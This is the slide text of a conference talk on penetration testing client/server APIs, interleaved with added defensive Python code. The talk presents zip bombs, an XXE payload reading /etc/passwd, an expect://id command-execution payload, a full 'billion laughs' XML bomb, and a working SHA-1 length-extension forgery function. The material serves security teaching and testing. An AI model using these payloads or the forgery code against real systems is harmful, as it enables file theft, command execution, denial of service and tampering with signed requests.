
CodeFest 2014 - Pentesting client/server API

http://2014.codefest.ru/lecture/696



  1. Pentesting client/server API. Sergey Belov
  2. $ whoami © 2002—2014, Digital Security • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  3. What are we talking about? API
  4. What are we talking about? API
  5. Hacking via API
  6. Hacking via API
  7. Hacking via API: From interface to API methods
  8. Hacking via API
  9. Hacking via API
  10. Hacking via API
  11. Hacking via API
  12. Hacking via API: What should we test? • Logic! • Bypassing restrictions (SQLi/XSS) • Parameter tampering. Development: • Stop hacks and custom implementations in the API! Really.
  13. Hacking via API
  14. Hacking via API: ZIP
  15. Hacking via API: 42 Kb…
  16. Hacking via API: 42 Kb… …10 Gb?
  17. Hacking via API: 42 Kb… …10 Gb? …100 Gb?
  18. Hacking via API: 42 Kb… …10 Gb? …100 Gb? …100 Tb?
  19. Hacking via API: 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
  20. Hacking via API: Say HELLO to ZIP BOMB!
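Slides 14 to 20 show the classic 42 Kb archive that unpacks to 4.5 Pb. The following is an added example, not code from the talk or from Digital Security: a Python extractor for an API endpoint that accepts uploaded archives. It rejects an archive on three independent limits (total unpacked bytes, per-member compression ratio, nesting depth), charges the budget for bytes actually inflated rather than trusting the headers, and shares that budget with nested archives. The limits MAX_TOTAL, MAX_RATIO and MAX_DEPTH and the test archives built in memory are constructed assumptions.

```python
import io
import zipfile


class ZipBombSuspected(ValueError):
    """Archive breaks the unpacked-size, ratio or nesting limit."""


# Illustrative limits (assumptions); tune to what the endpoint legitimately needs.
MAX_TOTAL = 10 * 1024 * 1024   # unpacked bytes, summed over members and nesting levels
MAX_RATIO = 100                # uncompressed : compressed, per member
MAX_DEPTH = 2                  # archives inside archives (nesting is how zip bombs multiply)


def safe_extract(zip_bytes, max_total=MAX_TOTAL, max_ratio=MAX_RATIO, max_depth=MAX_DEPTH, _budget=None):
    """Return {name: bytes} for every regular member, or raise ZipBombSuspected.
    _budget is a one-element list shared with recursive calls, so a nested
    archive cannot start with a fresh allowance."""
    budget = [max_total] if _budget is None else _budget
    out = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # 1. Cheap checks on the central directory before inflating anything.
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                raise ZipBombSuspected(
                    f"{info.filename}: ratio {info.file_size // info.compress_size}:1 exceeds {max_ratio}:1")
            if info.file_size > budget[0]:
                raise ZipBombSuspected(
                    f"{info.filename}: declares {info.file_size} B, {budget[0]} B of budget left")
            # 2. Headers can be forged, so charge the budget for bytes actually inflated.
            chunks = []
            with zf.open(info) as fh:
                while True:
                    chunk = fh.read(64 * 1024)
                    if not chunk:
                        break
                    budget[0] -= len(chunk)
                    if budget[0] < 0:
                        raise ZipBombSuspected(f"{info.filename}: inflated past the budget")
                    chunks.append(chunk)
            data = b"".join(chunks)
            # 3. Nested archives are unpacked against the same budget, to a bounded depth.
            if zipfile.is_zipfile(io.BytesIO(data)):
                if max_depth == 0:
                    raise ZipBombSuspected(f"{info.filename}: archive nested too deep")
                out.update(safe_extract(data, max_ratio=max_ratio, max_depth=max_depth - 1, _budget=budget))
            else:
                out[info.filename] = data
    return out


def is_rejected(zip_bytes, **limits):
    """True if safe_extract refuses the archive under the given limits."""
    try:
        safe_extract(zip_bytes, **limits)
    except ZipBombSuspected:
        return True
    return False


def build_zip(members, compression=zipfile.ZIP_DEFLATED):
    """Build a constructed test archive in memory (not a real-world sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed inputs: a normal upload, a high-ratio member, and nested archives.
BENIGN = build_zip({"report.csv": b"id,amount\n" + b"".join(f"{i},{i * 7}\n".encode() for i in range(200))})
HIGH_RATIO = build_zip({"zeros.bin": b"\x00" * (20 * 1024 * 1024)})   # roughly 1000:1 with DEFLATE
ONE_LEVEL = build_zip({"inner.zip": build_zip({"note.txt": b"hi"})}, zipfile.ZIP_STORED)
_deep = build_zip({"note.txt": b"hi"})
for _level in range(4):
    _deep = build_zip({f"level{_level}.zip": _deep}, zipfile.ZIP_STORED)
DEEPLY_NESTED = _deep

if __name__ == "__main__":
    print("benign members:", list(safe_extract(BENIGN)))
    print("one nested level:", safe_extract(ONE_LEVEL))
    print("high ratio rejected:", is_rejected(HIGH_RATIO))
    print("deep nesting rejected:", is_rejected(DEEPLY_NESTED))
```

The ratio and declared-size checks cost nothing because they read only the central directory; the chunked read is what actually bounds memory and CPU when an attacker lies in the headers, and the shared budget is what defeats the nesting trick.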
  21. Hacking via API: The evil of JavaScript and
  22. Hacking via API
  23. Hacking via API
  24. Hacking via API: http://habrahabr.ru/post/186160/
  25. Hacking via API: Crypto
  26. Hacking via API: Query signing. Sign = sha*(…+DATA+…), APIkey
  27. Hacking via API
  28. Hacking via API: But why?
  29. Hacking via API: Say hello again. To length extension attack
  30. Hacking via API: A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
  31. Hacking via API: Some have hijacked just 1 request…
  32. Hacking via API: What does the attacker know? • Original data • Sign (token)
  33. Hacking via API: What does the attacker want? Change some data / change params
  34. Hacking via API: A=1&B=2&C=3\x80\x00\x00…\x02&C=4
  35. Hacking via API: Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU: sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
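Slides 26 to 35 explain why TOKEN = sha1(KEY+DATA) lets anyone who has seen one signed request append parameters. The block below is an added example, not code from the talk: a regression test a development team can keep next to its signing code. It carries its own SHA-1 (so the compression state can be resumed from a digest, which hashlib does not allow), shows that the slide-34 extension is accepted by a sha1(KEY+DATA) verifier that never sees the key, and shows that the same check fails against HMAC-SHA1 from the standard library, which is the fix. The key, the query string and the extension are constructed sample values; the test passes the key length to the check because the scheme must hold for every length.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def sha1_padding(msg_len):
    """Bytes SHA-1 appends to a msg_len-byte message: 0x80, zeros, 64-bit bit length."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def _compress(state, block):
    """One SHA-1 compression round over a 64-byte block (FIPS 180-4)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK, a, _rotl(b, 30), c, d
    return tuple((s + v) & MASK for s, v in zip(state, (a, b, c, d, e)))


def sha1(data, state=None, already_hashed=0):
    """SHA-1 of data. With state and already_hashed it continues from a known
    digest as though already_hashed bytes (a multiple of 64) had been absorbed."""
    if state is None:
        state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
    msg = data + sha1_padding(already_hashed + len(data))
    for off in range(0, len(msg), 64):
        state = _compress(state, msg[off:off + 64])
    return struct.pack(">5I", *state)


def sha1_matches_hashlib(data):
    """Self-check of the local SHA-1 against the standard library."""
    return sha1(data) == hashlib.sha1(data).digest()


# The scheme from the slides: TOKEN = sha1(KEY + DATA).
def sign_naive(key, data):
    return hashlib.sha1(key + data).digest()


def verify_naive(key, data, token):
    return hmac.compare_digest(sign_naive(key, data), token)


# The fix: a keyed MAC (HMAC-SHA1) instead of a bare hash over key and data.
def sign_hmac(key, data):
    return hmac.new(key, data, hashlib.sha1).digest()


def verify_hmac(key, data, token):
    return hmac.compare_digest(sign_hmac(key, data), token)


def extend(token, data, extension, key_len):
    """From one observed (data, token) pair and only the key LENGTH, build
    data||padding||extension and the token that sha1(KEY+DATA) gives it."""
    glue = sha1_padding(key_len + len(data))          # the \x80\x00...\x02 bytes of slide 34
    resumed = struct.unpack(">5I", token)             # the digest is the hash's internal state
    new_token = sha1(extension, resumed, key_len + len(data) + len(glue))
    return data + glue + extension, new_token


def scheme_is_malleable(sign, verify, key, data, extension):
    """True if a message extended without the key is accepted by verify."""
    forged_data, forged_token = extend(sign(key, data), data, extension, len(key))
    return verify(key, forged_data, forged_token)


KEY = b"s3cret-api-key"      # constructed sample secret that stays on the server
DATA = b"A=1&B=2&C=3"        # the query string from slide 30
EXTENSION = b"&C=4"          # parsers that keep the last duplicate now see C=4

if __name__ == "__main__":
    print("local sha1 correct:     ", sha1_matches_hashlib(b"abc"))
    print("sha1(KEY+DATA) malleable:", scheme_is_malleable(sign_naive, verify_naive, KEY, DATA, EXTENSION))
    print("HMAC-SHA1 malleable:     ", scheme_is_malleable(sign_hmac, verify_hmac, KEY, DATA, EXTENSION))
```

Both verifiers already use hmac.compare_digest, so the difference is purely the construction: a hash whose output is its own internal state can be continued, an HMAC cannot. Parameter order (DATA+KEY instead of KEY+DATA) does not rescue the scheme either; it only changes which attack applies, so the check above belongs in the test suite regardless of order.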
  36. Hacking via API: Request hijacking… How?
  37. Hacking via API
  38. Hacking via API
  39. Hacking via API
  40. Hacking via API
  41. Hacking via API
  42. Hacking via API
  43. Hacking via API
  44. Hacking via API
  45. Hacking via API: XML? XML entities!
  46. Hacking via API: DTD example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  47. Hacking via API: XML entities? External Entity!
  48. Hacking via API: <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  49. Hacking via API: <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <foo>&xxe;</foo>
  50. Hacking via API: XML Bombs!
  51. Hacking via API: <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  52. What are we talking about? Man in the Middle
  53. Hacking via API: Examples?
  54. Hacking via API: 2013-11-19 by Reginaldo Silva
  55. Hacking via API: https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  56. Hacking via API: Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
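Slides 45 to 51 show external entities and the lolz bomb, and slide 56 gives the one-line development advice: disable entities. The block below is an added example, not code from the talk, of what that advice looks like in Python's standard library: a gate built on pyexpat handlers that refuses any DOCTYPE, entity declaration or external entity reference before the document is handed to ElementTree. Because both internal entities (the bomb) and external entities (file:///etc/passwd, expect://id) can only be declared inside a DOCTYPE, aborting at the DOCTYPE stops both before anything is expanded or fetched. The sample documents are constructed from the slide text; the bomb is cut at three levels so the test input stays small.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DtdForbidden(ValueError):
    """The document declares a DTD, an entity, or references an external entity."""


def reject_dtd(xml_bytes):
    """Walk the document with expat and abort at the first DTD construct.
    Raising inside a pyexpat handler stops the parser and propagates the exception,
    so the entity bodies after the DOCTYPE are never evaluated."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE {name!r} is not accepted on this endpoint")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise DtdForbidden(f"entity declaration {name!r} is not accepted")

    def on_external_ref(context, base, sysid, pubid):
        raise DtdForbidden(f"external entity {sysid!r} is not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)


def safe_parse(xml_bytes):
    """Parse untrusted API input: gate first, then build the tree."""
    reject_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)


def is_rejected(xml_bytes):
    """True if the gate refuses the document."""
    try:
        safe_parse(xml_bytes)
    except DtdForbidden:
        return True
    return False


# Constructed inputs built from the slide text.
BENIGN = b'<?xml version="1.0"?><author>Donald Duck</author>'
XXE_FILE = (b'<!DOCTYPE foo [ <!ELEMENT foo ANY > '
            b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>')
XXE_EXPECT = (b'<!DOCTYPE foo [ <!ELEMENT foo ANY > '
              b'<!ENTITY xxe SYSTEM "expect://id" >]> <foo>&xxe;</foo>')
# Three levels (1000 copies) instead of nine, so the constructed input stays small.
SMALL_BOMB = (b'<?xml version="1.0"?><!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> '
              b'<!ENTITY lol1 "' + b"&lol;" * 10 + b'"> '
              b'<!ENTITY lol2 "' + b"&lol1;" * 10 + b'"> '
              b'<!ENTITY lol3 "' + b"&lol2;" * 10 + b'"> ]> <lolz>&lol3;</lolz>')

if __name__ == "__main__":
    print("benign author:", safe_parse(BENIGN).text)
    for label, doc in [("file XXE", XXE_FILE), ("expect XXE", XXE_EXPECT), ("bomb", SMALL_BOMB)]:
        print(f"{label} rejected:", is_rejected(doc))
```

Refusing the DOCTYPE outright is the simplest policy for an API that never legitimately receives DTDs; it is stricter than only turning off external entity resolution, and it also removes the internal-entity bomb that a resolver setting would leave in place.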
  57. Hacking via API: Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
  58. twitter.com/sergeybelove sbelov@dsec.ru Digital Security in Moscow: (495) 223-07-86 Digital Security in Saint Petersburg: (812) 703-15-47 Hacking via API. Thanks for your attention! Questions?
